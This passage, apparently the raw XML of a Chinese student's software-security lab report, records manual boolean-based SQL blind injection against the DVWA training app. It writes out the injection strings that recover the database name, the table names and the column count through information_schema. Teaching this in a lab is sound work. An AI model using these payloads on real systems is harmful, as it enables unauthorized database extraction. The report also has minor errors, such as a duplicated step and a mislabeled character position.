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《软件安全》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张丛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 xml:space="preserve"> 学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2113662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信安一班</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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SQL盲注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ind w:left="420" w:left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基于DVWA里的SQL盲注案例，实施手工盲注，参考课本，撰写实验报告。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ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pP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ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pP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下载压缩包，解压文件，启动虚拟机，获取ip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="2576830"/>
            <wp:effectExtent l="0" t="0" r="952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主机浏览器网址栏输入ip进入网页，登录DVWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5330825" cy="2622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r="-1218" b="11487"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5330825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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2762885" cy="2541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22800" r="24741" b="14209"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2762885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317365" cy="12274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l="16868" t="10394" r="1157" b="48178"/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</w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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基于布尔SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0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         （1）判断是否存在输入，注入是字符型还是数字型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="5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输入1，显示用户存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="500"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4853940" cy="256794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1-1 #:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="500"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2880360" cy="18592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50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1=2 #,显示不存在：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="500" w:firstLine="210" w:firstLineChars="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3368040" cy="14173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500" w:firstLine="210" w:firstLineChars="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>说明存在字符型的SQL盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="500" w:firstLine="210" w:firstLineChars="100"/>
        <w:jc w:val="both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查看源码可知，程序未对id做任何处理：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="500" w:firstLine="210" w:firstLineChars="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="307594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5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猜测数据库名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="6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输入1' and length(database())=4 #，显示存在：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600" w:firstLine="210" w:firstLineChars="10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870960" cy="2590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说明数据库名长度为4。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="1260" w:firstLineChars="60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color w:val="000000"/>
        </w:rPr>
        <w:t>输入1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>se(),1,1))&gt;97 #，显示存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3642360" cy="194310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Chars="400" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>说明数据库名的第一个字符的ascii值大于97（小写字母a的ascii值）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="400" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minor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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>se(),1,1))&lt;100 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>显示不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>se(),1,1))&gt;100 #，显示不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2453640" cy="10591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600"/>
        <w:jc w:val="both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则数据库第一个字符的ascii的值为100，即小写字母d。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="1260" w:firstLineChars="60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color w:val="000000"/>
        </w:rPr>
        <w:t>输入1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>se(),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,1))&gt;97 #，显示存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3375660" cy="131064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说明第二个字符ascii值大于97(a);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:leftChars="400" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minor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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>se(),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,1))&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>显示不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>se(),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,1))&gt;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> #，显示不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2453640" cy="10591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600"/>
        <w:jc w:val="both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则数据库第一个字符的ascii的值为118，即小写字母v。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both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重复步骤，可得，数据库名为dvwa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="60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Chars="50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猜测数据库的表名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> and (select count(table_name) from information_schema.tables where table_schema=database() )=2 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>显示存在：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1508125"/>
            <wp:effectExtent l="0" t="0" r="4445" b="63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说明数据库中共有两个表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="6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6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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>显示存在：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1296670"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1397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说明第一个表名长度为9.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="6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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;122 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>显示存在：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="600"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="0" b="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即第一张表名第一个字母ascii值小于122（z）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="6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输入1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;103 # 显示不存在；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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输入1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&lt;103 # 显示不存在；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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则第一个字母为小写字母g.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="6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6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重复步骤，可得两个表名：guestbook、users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="60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Chars="50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猜测字段名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="6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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=8 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>显示存在：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="6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600"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1331595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="952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说明userss表中有8个字段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="60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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>同理，可按照上面步骤，利用二分法，得到字段名，甚至表中的数据名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
